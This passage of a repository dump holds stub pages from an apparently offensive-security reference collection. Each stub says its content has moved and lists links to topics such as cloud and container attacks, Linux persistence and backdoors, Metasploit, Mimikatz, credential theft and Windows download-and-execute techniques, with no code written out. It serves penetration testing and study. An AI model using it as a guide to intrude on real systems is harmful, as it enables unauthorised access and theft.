AWS](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/AWS%20Pentest/) 6 | - [AWS - Access Token & Secrets](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-access-token/) 7 | - [AWS - Service - Cognito](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-cognito/) 8 | - [AWS - Service - DynamoDB](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-dynamodb/) 9 | - [AWS - Service - EC2](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ec2/) 10 | - [AWS - Enumerate](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-enumeration/) 11 | - [AWS - Identity & Access Management](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-iam/) 12 | - [AWS - IOC & Detections](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ioc-detection/) 13 | - [AWS - Service - Lambda](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-lambda/) 14 | - [AWS - Metadata SSRF](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-metadata/) 15 | - [AWS - Service - S3 Buckets](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-s3-bucket/) 16 | - [AWS - Service - SSM](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ssm/) 17 | - [AWS - Training](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-training/) 18 | -------------------------------------------------------------------------------- /Methodology and Resources/Cloud - Azure Pentest.md: -------------------------------------------------------------------------------- 1 | # Cloud - Azure 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cloud/azure](https://github.com/swisskyrepo/InternalAllTheThings/) 4 | 5 | - [Azure AD Connect](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-ad-connect/) 6 | - [Azure AD Enumerate](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-enumeration/) 7 | - [Azure AD 
IAM](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-devices-users-sp/) 8 | - [Azure AD Phishing](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/) 9 | - [Azure AD Tokens](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-access-and-token/) 10 | - [Azure Persistence](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-persistence/) 11 | - [Azure Requirements](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-requirements/) 12 | - [Azure Services](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-services/) 13 | -------------------------------------------------------------------------------- /Methodology and Resources/Container - Docker Pentest.md: -------------------------------------------------------------------------------- 1 | # Container - Docker 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/containers/docker](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/) 4 | 5 | - [Tools](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#tools) 6 | - [Mounted Docker Socket](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#mounted-docker-socket) 7 | - [Open Docker API Port](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#open-docker-api-port) 8 | - [Insecure Docker Registry](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#insecure-docker-registry) 9 | - [Exploit privileged container abusing the Linux cgroup v1](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#exploit-privileged-container-abusing-the-linux-cgroup-v1) 10 | - [Abusing CAP_SYS_ADMIN capability](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#abusing-capsysadmin-capability) 11 | - [Abusing coredumps and 
core_pattern](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#abusing-coredumps-and-corepattern) 12 | - [Breaking out of Docker via runC](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#breaking-out-of-docker-via-runc) 13 | - [Breaking out of containers using a device file](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#breaking-out-of-containers-using-a-device-file) 14 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#references) 15 | -------------------------------------------------------------------------------- /Methodology and Resources/Container - Kubernetes Pentest.md: -------------------------------------------------------------------------------- 1 | # Container - Kubernetes 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/containers/kubernetes/](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/) 4 | 5 | - [Tools](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#tools) 6 | - [Exploits](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#exploits) 7 | - [Accessible kubelet on 10250/TCP](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#accessible-kubelet-on-10250tcp) 8 | - [Obtaining Service Account Token](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#obtaining-service-account-token) 9 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#references) 10 | -------------------------------------------------------------------------------- /Methodology and Resources/Escape Breakout.md: -------------------------------------------------------------------------------- 1 | # Application Escape and Breakout 2 | 3 | :warning: Content of this page has been moved to 
[InternalAllTheThings/cheatsheets/escape-breakout](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/) 4 | 5 | - [Gaining a command shell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#gaining-a-command-shell) 6 | - [Sticky Keys](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#sticky-keys) 7 | - [Dialog Boxes](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#dialog-boxes) 8 | - [Creating new files](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#creating-new-files) 9 | - [Open a new Windows Explorer instance](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#open-a-new-windows-explorer-instance) 10 | - [Exploring Context Menus](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#exploring-context-menus) 11 | - [Save as](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#save-as) 12 | - [Input Boxes](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#input-boxes) 13 | - [Bypass file restrictions](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#bypass-file-restrictions) 14 | - [Internet Explorer](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#internet-explorer) 15 | - [Shell URI Handlers](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#shell-uri-handlers) 16 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#references) 17 | -------------------------------------------------------------------------------- /Methodology and Resources/HTML Smuggling.md: -------------------------------------------------------------------------------- 1 | # HTML Smuggling 2 | 3 | :warning: Content of this page has been moved to 
[InternalAllTheThings/redteam/access/html-smuggling](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/) 4 | 5 | - [Description](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/#description) 6 | - [Executable Storage](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/#executable-storage) 7 | -------------------------------------------------------------------------------- /Methodology and Resources/Hash Cracking.md: -------------------------------------------------------------------------------- 1 | # Hash Cracking 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/hash-cracking](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/) 4 | 5 | - [Hashcat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#hashcat) 6 | - [Hashcat Example Hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) 7 | - [Hashcat Install](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#hashcat-install) 8 | - [Mask attack](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#mask-attack) 9 | - [Dictionary](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#dictionary) 10 | - [John](https://github.com/openwall/john) 11 | - [Usage](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#john-usage) 12 | - [Rainbow tables](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#rainbow-tables) 13 | - [Tips and Tricks](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#tips-and-tricks) 14 | - [Online Cracking Resources](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#online-cracking-resources) 15 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#references) 16 | 
-------------------------------------------------------------------------------- /Methodology and Resources/Initial Access.md: -------------------------------------------------------------------------------- 1 | # Initial Access 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/initial-access](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/) 4 | 5 | - [Complex Chains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#complex-chains) 6 | - [Container](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#container) 7 | - [Payload](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#payload) 8 | - [Binary Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#binary-files) 9 | - [Code Execution Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#code-execution-files) 10 | - [Embedded Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#embedded-files) 11 | - [Code Signing](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#code-signing) 12 | -------------------------------------------------------------------------------- /Methodology and Resources/Linux - Evasion.md: -------------------------------------------------------------------------------- 1 | # Linux - Evasion 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/linux-evasion](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/) 4 | 5 | - [File names](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#file-names) 6 | - [Command history](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#command-history) 7 | - [Hiding 
text](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#hiding-text) 8 | - [Timestomping](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#timestomping) 9 | -------------------------------------------------------------------------------- /Methodology and Resources/Linux - Persistence.md: -------------------------------------------------------------------------------- 1 | # Linux - Persistence 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/persistence/linux-persistence](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/) 4 | 5 | - [Basic reverse shell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#basic-reverse-shell) 6 | - [Add a root user](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#add-a-root-user) 7 | - [Suid Binary](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#suid-binary) 8 | - [Crontab - Reverse shell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#crontab---reverse-shell) 9 | - [Backdooring a user's bash_rc](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-users-bash_rc) 10 | - [Backdooring a startup service](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-startup-service) 11 | - [Backdooring a user startup file](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-user-startup-file) 12 | - [Backdooring Message of the Day](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-message-of-the-day) 13 | - [Backdooring a driver](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-driver) 
14 | - [Backdooring the APT](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-the-apt) 15 | - [Backdooring the SSH](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-the-ssh) 16 | - [Backdooring Git](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-git) 17 | - [Additional Linux Persistence Options](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#additional-persistence-options) 18 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#references) 19 | -------------------------------------------------------------------------------- /Methodology and Resources/Metasploit - Cheatsheet.md: -------------------------------------------------------------------------------- 1 | # Metasploit 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/command-control/metasploit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/) 4 | 5 | - [Installation](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#installation) 6 | - [Sessions](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#sessions) 7 | - [Background handler](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#background-handler) 8 | - [Meterpreter - Basic](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#meterpreter---basic) 9 | - [Generate a meterpreter](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#generate-a-meterpreter) 10 | - [Meterpreter Webdelivery](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#meterpreter-webdelivery) 11 | - [Get System](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#get-system) 12 | - 
[Persistence Startup](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#persistence-startup) 13 | - [Network Monitoring](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#network-monitoring) 14 | - [Portforward](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#portforward) 15 | - [Upload / Download](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#upload---download) 16 | - [Execute from Memory](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#execute-from-memory) 17 | - [Mimikatz](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#mimikatz) 18 | - [Pass the Hash - PSExec](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#pass-the-hash---psexec) 19 | - [Use SOCKS Proxy](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#use-socks-proxy) 20 | - [Scripting Metasploit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#scripting-metasploit) 21 | - [Multiple transports](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#multiple-transports) 22 | - [Best of - Exploits](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#best-of---exploits) 23 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#references) 24 | -------------------------------------------------------------------------------- /Methodology and Resources/Methodology and enumeration.md: -------------------------------------------------------------------------------- 1 | # Bug Hunting Methodology and Enumeration 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/methodology/bug-hunting-methodology](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/) 4 | 5 | ## Summary 6 | 7 | - [Passive 
Recon](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#passive-recon) 8 | - Shodan 9 | - Wayback Machine 10 | - The Harvester 11 | - Github OSINT 12 | 13 | - [Active Recon](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#active-recon) 14 | - [Network discovery](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#network-discovery) 15 | - [Web discovery](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#web-discovery) 16 | 17 | - [Web Vulnerabilities](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#looking-for-web-vulnerabilities) 18 | -------------------------------------------------------------------------------- /Methodology and Resources/Network Discovery.md: -------------------------------------------------------------------------------- 1 | # Network Discovery 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/network-discovery](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/) 4 | 5 | - [Nmap](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#nmap) 6 | - [Network Scan with nc and ping](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#network-scan-with-nc-and-ping) 7 | - [Spyse](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#spyse) 8 | - [Masscan](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#masscan) 9 | - [Netdiscover](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#netdiscover) 10 | - [Responder](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#responder) 11 | - [Bettercap](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#bettercap) 12 | - 
[Reconnoitre](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#reconnoitre) 13 | - [SSL MITM with OpenSSL](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#ssl-mitm-with-openssl) 14 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#references) 15 | -------------------------------------------------------------------------------- /Methodology and Resources/Powershell - Cheatsheet.md: -------------------------------------------------------------------------------- 1 | # Powershell 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/powershell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/) 4 | 5 | - [Execution Policy](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#execution-policy) 6 | - [Encoded Commands](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#encoded-commands) 7 | - [Constrained Mode](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#constrained-mode) 8 | - [Encoded Commands](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#encoded-commands) 9 | - [Download file](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#download-file) 10 | - [Load Powershell scripts](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#load-powershell-scripts) 11 | - [Load C# assembly reflectively](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#load-c-assembly-reflectively) 12 | - [Call Win API using delegate functions with 
Reflection](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#call-win-api-using-delegate-functions-with-reflection) 13 | - [Resolve address functions](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#resolve-address-functions) 14 | - [DelegateType Reflection](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#delegatetype-reflection) 15 | - [Example with a simple shellcode runner](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#example-with-a-simple-shellcode-runner) 16 | - [Secure String to Plaintext](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#secure-string-to-plaintext) 17 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/#references) 18 | -------------------------------------------------------------------------------- /Methodology and Resources/Source Code Management.md: -------------------------------------------------------------------------------- 1 | # Source Code Management & CI/CD Compromise 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/source-code-management-ci](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/) 4 | 5 | - [CI/CD Attacks](https://swisskyrepo.github.io/InternalAllTheThings/devops/) 6 | - [Azure DevOps](https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-azure-devops/) 7 | - [BuildKite](https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-buildkite/) 8 | - [CircleCI](https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-circle-ci/) 9 | - [Drone CI](https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-drone-ci/) 10 | - [GitHub Actions](https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-github-actions/) 11 | - [Gitlab 
CI](https://swisskyrepo.github.io/InternalAllTheThings/devops/cicd-gitlab-ci/) 12 | - [Package Managers and Build Files](https://swisskyrepo.github.io/InternalAllTheThings/devops/package-managers/) 13 | - [Hardcoded Secrets Enumeration](https://swisskyrepo.github.io/InternalAllTheThings/devops/secrets-enumeration/) 14 | -------------------------------------------------------------------------------- /Methodology and Resources/Vulnerability Reports.md: -------------------------------------------------------------------------------- 1 | # Vulnerability Reports 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/methodology/vulnerability-reports](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/) 4 | 5 | - [Tools](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#tools) 6 | - [Vulnerability Report Structure](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#vulnerability-report-structure) 7 | - [Vulnerability Details Structure](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#vulnerability-details-structure) 8 | - [General Guidelines](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#general-guidelines) 9 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#references) 10 | -------------------------------------------------------------------------------- /Methodology and Resources/Web Attack Surface.md: -------------------------------------------------------------------------------- 1 | # Subdomains Enumeration 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/web-attack-surface](https://github.com/swisskyrepo/InternalAllTheThings/redteam/access/web-attack-surface) 4 | 5 | - [Enumerate 
Subdomains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#enumerate-subdomains) 6 | - [Subdomains Databases](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#subdomains-databases) 7 | - [Bruteforce Subdomains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#bruteforce-subdomains) 8 | - [Certificate Transparency Logs](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#certificate-transparency-logs) 9 | - [DNS Resolution](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#dns-resolution) 10 | - [Technology Discovery](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#technology-discovery) 11 | - [Subdomain Takeover](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#subdomain-takovers) 12 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/web-attack-surface/#references) 13 | -------------------------------------------------------------------------------- /Methodology and Resources/Windows - DPAPI.md: -------------------------------------------------------------------------------- 1 | # Windows - DPAPI 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-dpapi](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/) 4 | 5 | - [List Credential Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#list-credential-files) 6 | - [DPAPI LocalMachine Context](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#dpapi-localmachine-context) 7 | - [Mimikatz - Credential Manager & DPAPI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#mimikatz---credential-manager--dpapi) 8 | - [Hekatomb - Steal all credentials on 
domain](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#hekatomb---steal-all-credentials-on-domain) 9 | - [DonPAPI - Dumping DPAPI credz remotely](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#donpapi---dumping-dpapi-credz-remotely) 10 | -------------------------------------------------------------------------------- /Methodology and Resources/Windows - Defenses.md: -------------------------------------------------------------------------------- 1 | # Windows - Defenses 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-defenses](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/) 4 | 5 | - [AppLocker](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#applocker) 6 | - [User Account Control](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#user-account-control) 7 | - [DPAPI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#dpapi) 8 | - [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#powershell) 9 | - [Anti Malware Scan Interface](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#anti-malware-scan-interface) 10 | - [Just Enough Administration](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#just-enough-administration) 11 | - [Constrained Language Mode](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#constrained-language-mode) 12 | - [Script Block Logging](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#script-block-logging) 13 | - [Protected Process Light](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#protected-process-light) 14 | - [Credential 
Guard](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#credential-guard) 15 | - [Event Tracing for Windows](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#event-tracing-for-windows) 16 | - [Windows Defender Antivirus](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-antivirus) 17 | - [Windows Defender Application Control](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-application-control) 18 | - [Windows Defender Firewall](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-firewall) 19 | - [Windows Information Protection](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-information-protection) 20 | -------------------------------------------------------------------------------- /Methodology and Resources/Windows - Download and Execute.md: -------------------------------------------------------------------------------- 1 | # Windows - Download and execute methods 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/windows-download-execute](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/) 4 | 5 | - [Downloaded files location](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#downloaded-files-location) 6 | - [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#powershell) 7 | - [Cmd](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#cmd) 8 | - [Cscript / Wscript](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#cscript-wscript) 9 | - 
[Mshta](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#mshta) 10 | - [Rundll32](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#rundll32) 11 | - [Regasm / Regsvc](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#regasm-regsvc-subtee) 12 | - [Regsvr32](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#regsvr32) 13 | - [Odbcconf](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#odbcconf) 14 | - [Msbuild](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#msbuild) 15 | - [Certutil](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#certutil) 16 | - [Bitsadmin](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#bitsadmin) 17 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#references) 18 | -------------------------------------------------------------------------------- /Methodology and Resources/Windows - Mimikatz.md: -------------------------------------------------------------------------------- 1 | # Windows - Mimikatz 2 | 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/mimikatz](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/) 4 | 5 | - [Execute commands](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#execute-commands) 6 | - [Extract passwords](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#extract-passwords) 7 | - [LSA Protection Workaround](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#lsa-protection-workaround) 8 | - [Mini 
